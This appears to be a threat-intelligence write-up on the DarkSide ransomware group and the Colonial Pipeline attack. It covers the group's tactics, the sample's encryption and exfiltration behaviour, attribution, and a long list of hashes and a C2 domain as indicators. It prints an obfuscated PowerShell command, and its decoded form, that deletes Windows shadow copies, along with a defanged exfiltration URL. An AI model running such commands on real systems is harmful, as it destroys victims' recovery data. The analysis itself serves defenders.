ransomware

Colonial Pipeline Attack: DarkSide Ransomware Analysis

DarkSide is an emerging RaaS (ransomware as a service) criminal group. The group may be organized by other former branches of ransomware activities. According to the previous attack rules announced by the group, the group will only target The medical, government, education, non-profit organizations, and organizations outside the funeral and interment industry launched blackmail attacks. The ransomware family first appeared in August 2020. As of now, 81 companies have been publicly attacked by the ransomware family.

clip_image001

Attack

On April 20, 2021, the DarkSide group issued an announcement on its dark web site, claiming that it invaded many companies listed on the Nasdaq and other stock exchanges, and encrypted the core data of related companies. If the related companies refuse to pay the ransom, The gang is preparing to publish the stolen data and make a profit from the short-selling options of related companies.

clip_image002

On May 7, 2021, Colonial Pipeline, the largest fuel pipeline provider in the United States, encountered a targeted attack by the DarkSide group, forcing it to shut down the key fuel network that supplies fuel to the densely populated eastern states of the United States.

clip_image003

Technical

According to the analysis of the historical attack data of the DarkSide group, the attack characteristics of the group are different from other ransomware groups. A large amount of data will be stolen before the ransomware attack is released and installed against related organizations. It also created a distributed storage system in Iran. Used to store victim data.

clip_image004

Announcement from DarkSide Group on Storage System

   The main attack features of the Darkside gang:

o Ransomware is mainly targeted at Windows systems, but there are also variants targeted at Linux systems

o Use a large number of penetration testing tools to perform scanning and intrusion penetration against the external network systems of relevant organizations

o After entering the intranet of the relevant organization, it will attack the Windows domain controller in an attempt to control the entire intranet of the enterprise

o The core data of the stolen organization will be uploaded to the private cloud distributed storage system

o After controlling the core assets of the organization, the final implementation of the installation of ransomware attack

Darkside’s extortion notice is tailored specifically for companies, and will specifically target companies’ accounting data, execution data, sales data, customer support data, marketing data, and other core value data for stealing and extorting attacks.

clip_image005

Ransomware analysis

The DarkSide ransomware virus will check to see if the current user is an administrator when it is first launched:

After starting to run, an icon will be released in the AppData\Local directory as the icon of the encrypted file. At the same time, the file name of the icon is also the file suffix added after the ransomware encrypted file (each sample is different, the current sample is “.82a71c82”)

clip_image007

The virus will inject the current user name, computer name and other information encrypted and sent to the server. The URL during the test is:

hxxp://securebestapp20.com/mhzPjMHjEl

clip_image008
clip_image009
clip_image010

Call system powershell to execute commands:

powershell -ep bypass -c “”(0..61)|%{$s+=[char][byte](‘0x’+’4765742D576D694F626A6563742057696E33325F536861646F77636F7079207C20466F72456163682D4F626A656374207B245F2E44656C65746528293B7D20’.Substring(2*$_,2))};iex $s””

clip_image011

The actual command after decrypting the string is the operation to delete the Windows system shadow:

Get-WmiObject Win32_Shadowcopy | ForEach-Object {$_.Delete();}

After the preparation work is completed, the virus starts two threads to encrypt files in a loop.

clip_image012

The ransomware uses the Salsa20 algorithm to encrypt the victim’s data, and then uses the RSA-1024 algorithm to encrypt the Salsa20 key and put it at the end of the file.

clip_image013

In the end, the virus will modify the user’s desktop background and leave a blackmail message asking the victim to contact himself to pay the ransom.

clip_image014
clip_image015

05 gang association traceability analysis

DarkSide gang members once posted DarkSide-related ransomware information on well-known Russian forums.

clip_image016

The ransomware virus will determine the default language of the system, if it is a Russian language, the system files will not be encrypted

clip_image017

Judging from the comprehensive technical characteristics and historical activities, the gang is a typical RaaS (Extortion as a Service) criminal gang, and a large number of Russian-speaking personnel are suspected.

IOCs

securebestapp20.com

68ada5f6aa8e3c3969061e905ceb204c
69ec3d1368adbe75f3766fc88bc64afc
c830512579b0e08f40bc1791fc10c582
c4f1a1b73e4af0fbb63af8ee89a5a7fe
29bcd459f5ddeeefad26fc098304e786
f87a2e1c3d148a67eaeb696b1ab69133
01cef4d4f9306177d42f221854ee552b
0e178c4808213ce50c2540468ce409d3
0ed51a595631e9b4d60896ab5573332f
3fd9b0117a0e79191859630148dcdc6d
47a4420ad26f60bb6bba5645326fa963
4d419dc50e3e4824c096f298e0fa885a
5ff75d33080bb97a8e6b54875c221777
66ddb290df3d510a6001365c3a694de2
6a7fdab1c7f6c5a5482749be5c4bf1a4
885fc8fb590b899c1db7b42fe83dddc3
91e2807955c5004f13006ff795cb803c
9d418ecc0f3bf45029263b0944236884
9e779da82d86bcd4cc43ab29f929f73f
c2764be55336f83a59aa0f63a0b36732
c363e327287081251b820276cd9ce1f8
d6634959e4f9b42dfc02b270324fa6d9
e44450150e8683a0addd5c686cd4d202
f75ba194742c978239da2892061ba1b4
f9fc1a1a95d5723c140c2a8effc93722
04fde4340cc79cd9e61340d4c1e8ddfb
6fdd82160ccf88cf5adc39f851859034124fd7c9
11936a92144ef1b53eef16566a57b9052d173291
2fc8514367d4799d90311b1b1f277b3fca5ca731
5604a48ce74124fb478049976db48197896b6743
076d0d8d07368ef680aeb0c08f7f2e624c46cbc5
d1dfe82775c1d698dd7861d6dfa1352a74551d35
e06c0d3ae9eb341182e937f44906c240cff4c057
38b5aa765026dffbb603e323333294b5f5efa5ee
7ae73b5e1622049380c9b615ce3b7f636665584b
cf04fa736baf22a2ca4e67f1c7723f1776267e28
7a29a8f5e14da1ce40365849eb59487dbb389d08
304aa8ce88264f6e8db32ce3d3b267f64b426488
810d6c70a96584486867cedde111a1087ed1ebe7
77b9103d4af311ba76511144d47aed440ae6ce9f
4e6d303d96621769b491777209c237b4061e3285
c104056f9a926d27a2082f0510c97b09cb0eb3e5
a3e7561de73378b453186a6c33858bf47577d69c
eeb28144f39b275ee1ec008859e80f215710dc57
e6b47869caa776840ab79856b04096152103c71d
0bfc26e7a035a143339516b877ac11eefbbeefb5
5a3d0fff6dda6121c379e2e4a5e756cb034b99e4
bafb90827abb85a167d2d558e31008cf82be63e3
8c482a0eed33c8a4542c3cb2715a242f2259343d
c43ee0cef6acee7d503f056764abc64d8f7ae9b9
ce2480dec2ee0a47549fad355c3cf154f9aab836
88fc623483f7ffe57f986ed10789e6723083fcd8
ec368752c2cf3b23efbfa5705f9e582fc9d6766435a7b8eea8ef045082c6fbce
508dd6f7ed6c143cf5e1ed6a4051dd8ee7b5bf4b7f55e0704d21ba785f2d5add
12ee27f56ec8a2a3eb2fe69179be3f7a7193ce2b92963ad33356ed299f7ed975
3dabd40d564cf8a8163432abc38768b0a7d45f0fc1970d802dc33b9109feb6a6
fb76b4a667c6d790c39fcc93a3aac8cd2a224f0eb9ece4ecfd7825f606c2a8b6
9cee5522a7ca2bfca7cd3d9daba23e9a30deb6205f56c12045839075f7627297
124e83f0812629fbc7ee0330002d7e5026b0f79e29a7d42facd62dd67b83549a
533672da9d276012ebab3ce9f4cd09a7f537f65c6e4b63d43f0c1697e2f5e48d
243dff06fc80a049f4fb37292f8b8def0fce29768f345c88ee10699e22b0ae60
27214dcb04310040c38f8d6a65fe03c14b18d4171390da271855fdd02e06768f
78782fd324bc98a57274bd3fff8f756217c011484ebf6b614060115a699ee134
ac092962654b46a670b030026d07f5b8161cecd2abd6eece52b7892965aa521b
6228f75f52fd69488419c0e0eb3617b5b894a566a93e52b99a9addced7364cff
f764c49daffdacafa94aaece1d5094e0fac794639758e673440329b02c0fda39
1cc7c198a8a2c935fd6f07970479e544f5b35a8eb3173de0305ebdf76a0988cb
0839aabe5fd63b16844a27b3c586c02a044d119010a1a40ee4035501c34eae0d
06cfe7f5d88e82f7adda6d8333ca8b302debb22904c68a942188be5730e9b3c8
151fbd6c299e734f7853497bd083abfa29f8c186a9db31dbe330ace2d35660d5
68872cc22fbdf0c2f69c32ac878ba9a7b7cf61fe5dd0e3da200131b8b23438e7
bac2149254f5ce314bab830f574e16c9d67e81985329619841431034c31646e0
1ef8db7e8bd3aaba8b1cef96cd52fde587871571b1719c5d40f9a9c98dd26f84
cc54647e8c3fe7b701d78a6fa072c52641ac11d395a6d2ffaf05f38f53112556
691515a485b0b3989fb71c6807e640eeec1a0e30d90500db6414035d942f70a5
afb22b1ff281c085b60052831ead0a0ed300fac0160f87851dacc67d4e158178
43e61519be440115eeaa3738a0e4aa4bb3c8ac5f9bdfce1a896db17a374eb8aa
8cfd28911878af048fb96b6cc0b9da770542576d5c2b20b193c3cfc4bde4d3bc